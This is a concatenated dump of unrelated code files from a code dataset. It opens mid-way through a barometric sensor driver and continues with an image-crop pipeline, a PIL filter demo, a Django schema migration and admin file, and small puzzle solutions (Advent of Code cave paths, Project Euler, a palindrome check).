        c21 = (src1E << 8) | src1F
        c21 = getTwosComplement(c21, 16)
        return c00, c10, c20, c30, c01, c11, c21

    def __getTemperatureCalibrationCoefficients(self):
        """Read temperature calibration coefficients from registers 0x10-0x12.

        Returns:
            tuple: (c0, c1), each a sign-extended 12-bit value.
        """
        src10 = self.read_byte_data(self.address, 0x10)
        src11 = self.read_byte_data(self.address, 0x11)
        src12 = self.read_byte_data(self.address, 0x12)
        c0 = (src10 << 4) | (src11 >> 4)
        c0 = getTwosComplement(c0, 12)
        c1 = ((src11 & 0x0F) << 8) | src12
        c1 = getTwosComplement(c1, 12)
        return c0, c1

    #############################################################################
    def calcScaledPressure(self):
        """Return the raw pressure divided by the oversampling scale factor kP."""
        return self.__getRawPressure() / self.kP

    def calcScaledTemperature(self):
        """Return the raw temperature divided by the oversampling scale factor kT."""
        return self.__getRawTemperature() / self.kT

    def calcCompTemperature(self, scaled_t):
        """Return the compensated temperature in degrees Celsius.

        Args:
            scaled_t (float): Scaled temperature from calcScaledTemperature().
        """
        c0, c1 = self.__getTemperatureCalibrationCoefficients()
        return c0 * 0.5 + scaled_t * c1

    def calcCompPressure(self, scaled_p, scaled_t):
        """Return the compensated pressure in Pascal.

        Implements the datasheet polynomial:
        Pcomp = c00 + Praw*(c10 + Praw*(c20 + Praw*c30))
                    + Traw*(c01 + Praw*(c11 + Praw*c21))

        Args:
            scaled_p (float): Scaled pressure from calcScaledPressure().
            scaled_t (float): Scaled temperature from calcScaledTemperature().
        """
        c00, c10, c20, c30, c01, c11, c21 = self.__getPressureCalibrationCoefficients()
        comp_p = (c00 + scaled_p * (c10 + scaled_p * (c20 + scaled_p * c30))
                  + scaled_t * (c01 + scaled_p * (c11 + scaled_p * c21)))
        return comp_p

    def measureTemperatureOnce(self):
        """Return one compensated temperature value [C]."""
        t = self.calcScaledTemperature()
        return self.calcCompTemperature(t)

    def measurePressureOnce(self):
        """Return one compensated pressure value [Pa]."""
        p = self.calcScaledPressure()
        t = self.calcScaledTemperature()
        return self.calcCompPressure(p, t)

    def measureBothOnce(self):
        """Return (compensated temperature [C], compensated pressure [Pa])."""
        t = self.calcScaledTemperature()
        temp = self.calcCompTemperature(t)
        p = self.calcScaledPressure()
        pressure = self.calcCompPressure(p, t)
        return temp, pressure
|
995,093 | 587258852da591df2b147aa341c601527b77878f | import itertools as I
from uuid import uuid4
from dw.db import schema as S
from dw.util import fp
from dw.util.etc_utils import modulo_pad, factorseq
def crop_xys_list(org_ws, org_hs, crop_w, crop_h):
    """For each origin size (w, h), list the (x, y) top-left corners of the
    crop_w x crop_h tiles covering the size padded up to a crop multiple."""
    padded_ws = (w + modulo_pad(w, crop_w) for w in org_ws)
    padded_hs = (h + modulo_pad(h, crop_h) for h in org_hs)
    xs_per_img = (list(factorseq(w, crop_w)) for w in padded_ws)
    ys_per_img = (list(factorseq(h, crop_h)) for h in padded_hs)
    return fp.lmap(fp.pipe(I.product, list), xs_per_img, ys_per_img)
#---------------------------------------------------------------
def valid(ids, types, origin_ws, origin_hs, crop_w, crop_h):
    """Validation hook for the pipeline; currently accepts every input."""
    return True
def load(ids, types, origin_ws, origin_hs, crop_w, crop_h):
    """Bundle the inputs unchanged into one tuple for process().

    ids / types / origin_ws / origin_hs describe the source images;
    crop_w / crop_h is the target crop size.
    """
    return (ids, types, origin_ws, origin_hs, crop_w, crop_h)
def process(loaded):
    """Expand each origin image into the grid of (x, y) crop origins.

    Pads each origin size up to a multiple of the crop size, then takes the
    cartesian product of per-image x and y factor sequences.

    Returns (ids, types, org_whs, w, h, xys_list) where xys_list[i] is the
    list of crop origins of image i.
    """
    ids, types, org_ws,org_hs, w,h = loaded
    # Make img_(w,h)s multiply of crop_(w,h)
    '''
    img_wseq = (org_w + modulo_pad(org_w,w) for org_w in org_ws)
    img_hseq = (org_h + modulo_pad(org_h,h) for org_h in org_hs)
    xs = [list(factorseq(img_w, w)) for img_w in img_wseq]
    ys = [list(factorseq(img_h, h)) for img_h in img_hseq]
    xys_list = fp.lmap(fp.pipe(I.product, list), xs, ys)
    '''
    xys_list = crop_xys_list(org_ws, org_hs, w, h)
    # NOTE: zip object is lazy and single-pass; it is consumed downstream in canonical().
    org_whs = zip(org_ws, org_hs)
    '''
    from pprint import pprint
    print('---------------------------')
    #pprint(xys_list)
    pprint(loaded)
    #pprint(fp.lmap(list,xyseq))
    pprint(xs)
    '''
    # One crop-origin list per source image.
    assert len(ids) == len(xys_list)
    return ids, types, org_whs, w,h, xys_list
def canonical(processed):
    """Map each origin image to the DB rows describing its crops.

    Input tuple (from process()): org_ids/types/org_whs are parallel origin
    image info; (w, h) is the uniform crop size; xys_list[i] holds the crop
    origin coords of image i.

    Returns a lazy sequence of schema rows: one `data` row per crop, a COMMIT
    marker, one `image` row per crop, and one `image_crop` relation linking
    each crop back to its origin image.
    """
    org_ids, types, org_whs, w,h, xys_list = processed
    # org_ids, types, org_whs are origin image info. same len.
    # w, h are all crops size
    # xys_list is begin coord(x,y) of crops of images.
    # list of list, same len with other lists.
    # Fresh UUID per crop, grouped per origin image.
    crop_ids_list = fp.lmap(
        lambda xys: fp.lrepeatedly(uuid4, len(xys)), xys_list)
    # Flatten to one (crop_id, origin_id, type, origin_wh) tuple per crop.
    zipped = fp.lmapcat(
        lambda cids, oid, type, org_wh:
        fp.lzip(cids,
            fp.repeat(oid),
            fp.repeat(type),
            fp.repeat(org_wh)),
        crop_ids_list, org_ids, types, org_whs)
    crop_ids, img_ids, crop_types, full_whs = fp.unzip(zipped)
    crop_xys = fp.lcat(xys_list)
    return fp.concat(
        (S.data(uuid=id, type=type)
         for id, type in zip(crop_ids, crop_types)),
        [S.COMMIT],
        (S.image(uuid=id, x=x,y=y, w=w,h=h, full_w=fw,full_h=fh)
         for id, (x,y), (fw,fh) in
         zip(crop_ids, crop_xys, full_whs)),
        (S.data_relation(aid=iid, bid=cid, type='image_crop')
         for iid, cid in zip(img_ids, crop_ids)))
|
995,094 | ae038b7f4bb52a981c2432cfb1615f983ba57cd9 | from PIL import Image,ImageFilter
from matplotlib import pyplot as plt
# Load the source image and derive filtered variants.
img = Image.open('image/a0.jpg')
img1 = img.filter(ImageFilter.CONTOUR)            # contour / outline
img2 = img.filter(ImageFilter.BLUR)               # blur
img3 = img.filter(ImageFilter.BoxBlur(radius=1))  # box blur
img4 = img.filter(ImageFilter.DETAIL)             # detail sharpening
img5 = img.filter(ImageFilter.EMBOSS)             # emboss
img6 = img.filter(ImageFilter.EDGE_ENHANCE)       # edge enhance (computed but never displayed)
fig = plt.figure(figsize=(300, 100))
# Render the original plus the first five filtered variants in a 1x6 grid
# (subplot codes 161..166, same as the original unrolled calls).
for slot, variant in enumerate((img, img1, img2, img3, img4, img5), start=161):
    plt.subplot(slot)
    plt.imshow(variant)
plt.show()
995,095 | d4d6a474f48a6975796267900f148b263684d4fb | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-20 20:30
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Rename api model fields to snake_case and reshape nrcs_monthlysnow from
    one-column-per-month into one-row-per-month.

    Auto-generated by Django 1.10.6; do not hand-edit the operation list.
    NOTE(review): the 36 RemoveField operations drop the per-month snow data
    columns without a data migration — presumably the data was re-imported;
    confirm before applying to a populated database.
    """
    dependencies = [
        ('api', '0004_auto_20170319_2143'),
    ]
    operations = [
        # --- Rename CamelCase columns to snake_case ---
        migrations.RenameField(
            model_name='nrcs_locations',
            old_name='County',
            new_name='county',
        ),
        migrations.RenameField(
            model_name='nrcs_locations',
            old_name='Elev',
            new_name='elev',
        ),
        migrations.RenameField(
            model_name='nrcs_locations',
            old_name='Hydrologic_Unit',
            new_name='hydrologic_unit',
        ),
        migrations.RenameField(
            model_name='nrcs_locations',
            old_name='Lat',
            new_name='lat',
        ),
        migrations.RenameField(
            model_name='nrcs_locations',
            old_name='Lon',
            new_name='lon',
        ),
        migrations.RenameField(
            model_name='nrcs_locations',
            old_name='Ntwk',
            new_name='ntwk',
        ),
        migrations.RenameField(
            model_name='nrcs_locations',
            old_name='SHEF',
            new_name='shef',
        ),
        migrations.RenameField(
            model_name='nrcs_locations',
            old_name='Site_Name',
            new_name='site_name',
        ),
        migrations.RenameField(
            model_name='nrcs_locations',
            old_name='Station',
            new_name='station',
        ),
        migrations.RenameField(
            model_name='nrcs_monthlysnow',
            old_name='Water_Year',
            new_name='water_year',
        ),
        # --- Drop the 36 per-month columns (12 months x 3 measures) ---
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Apr_collection_date',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Apr_snow_depth',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Apr_snow_water_equivalent',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Aug_collection_date',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Aug_snow_depth',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Aug_snow_water_equivalent',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Dec_collection_date',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Dec_snow_depth',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Dec_snow_water_equivalent',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Feb_collection_date',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Feb_snow_depth',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Feb_snow_water_equivalent',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Jan_collection_date',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Jan_snow_depth',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Jan_snow_water_equivalent',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Jul_collection_date',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Jul_snow_depth',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Jul_snow_water_equivalent',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Jun_collection_date',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Jun_snow_depth',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Jun_snow_water_equivalent',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Mar_collection_date',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Mar_snow_depth',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Mar_snow_water_equivalent',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='May_collection_date',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='May_snow_depth',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='May_snow_water_equivalent',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Nov_collection_date',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Nov_snow_depth',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Nov_snow_water_equivalent',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Oct_collection_date',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Oct_snow_depth',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Oct_snow_water_equivalent',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Sep_collection_date',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Sep_snow_depth',
        ),
        migrations.RemoveField(
            model_name='nrcs_monthlysnow',
            name='Sep_snow_water_equivalent',
        ),
        # --- Replace them with per-row month/measure columns ---
        migrations.AddField(
            model_name='nrcs_monthlysnow',
            name='collection_date',
            field=models.DateField(null=True),
        ),
        migrations.AddField(
            model_name='nrcs_monthlysnow',
            name='collection_month',
            field=models.PositiveSmallIntegerField(default=1),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='nrcs_monthlysnow',
            name='snow_depth',
            field=models.PositiveSmallIntegerField(null=True),
        ),
        migrations.AddField(
            model_name='nrcs_monthlysnow',
            name='snow_water_equivalent',
            field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
        ),
    ]
|
995,096 | 28bebf8e090e9a3438503763eddf2a36c47d7b37 | from django.contrib import admin
from .models import *
# Expose the models in the Django admin with the default ModelAdmin options.
admin.site.register(Client)
admin.site.register(ServiceProvider_Motor)
|
995,097 | 1bcc41c5fc94446dbd0e5cc3d19313e298d493b2 | from collections import defaultdict
import time
# Wall-clock timer for the final runtime report.
start_time = time.time()
# Puzzle input: one "a-b" edge per line (Advent of Code 2021 day 12 style).
content = open('i', 'r').readlines()
content = [c.strip() for c in content]
# Undirected adjacency list of the cave graph.
G = defaultdict(list)
# Number of distinct start->end paths found so far.
count = 0
for row in content:
    left, right = row.split('-')
    G[left].append(right)
    G[right].append(left)
def dfs(node, V, using_twice):
    """Count start->end paths through the cave graph G, allowing at most one
    small (lowercase) cave to be entered twice per path. Accumulates into the
    module-level `count`.
    """
    global count
    if node == 'end':
        count += 1
        return
    revisit = node.islower() and node in V
    if revisit:
        # 'start' may never be re-entered; any other small cave at most twice.
        if node == 'start' or using_twice:
            return
        using_twice = True
    if node.islower():
        V.add(node)
    for child in G[node]:
        dfs(child, V, using_twice)
    # Only unmark the cave if this call was the one that first added it.
    if node.islower() and not revisit:
        V.remove(node)
# Start the search with an empty visited set and no small cave reused yet.
dfs('start', set(), False)
print(count)
# Report elapsed wall-clock time.
print("--- %s seconds ---" % (time.time() - start_time))
# Project Euler 9: find the Pythagorean triplet (a, b, c) with a + b + c == 1000
# and print the product a*b*c. The parenthesized print makes this valid on both
# Python 2 (single-argument form prints identically) and Python 3; the original
# `print a*b*c` statement was Python-2-only syntax.
for a in range(1, 999):
    for b in range(1, 1000 - a):
        c = 1000 - a - b
        if a * a + b * b == c * c:
            print(a * b * c)
995,099 | e0162ee53d82aadb71b59bc4f7fe45159f9221a4 | from copy import *
class Solution:
    def isPalindrome(self, s: str) -> bool:
        """Return True if `s` reads the same forwards and backwards, considering
        only alphanumeric characters and ignoring case (empty input counts as a
        palindrome).

        Fixes: removed the leftover debug print of the filtered list, the dead
        `if not s: return False` branch (unreachable after the empty-string
        return), and the redundant in-place reverse before comparing against
        the slice-reversed copy.
        """
        filtered = [ch for ch in s.lower() if ch.isalnum()]
        return filtered == filtered[::-1]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.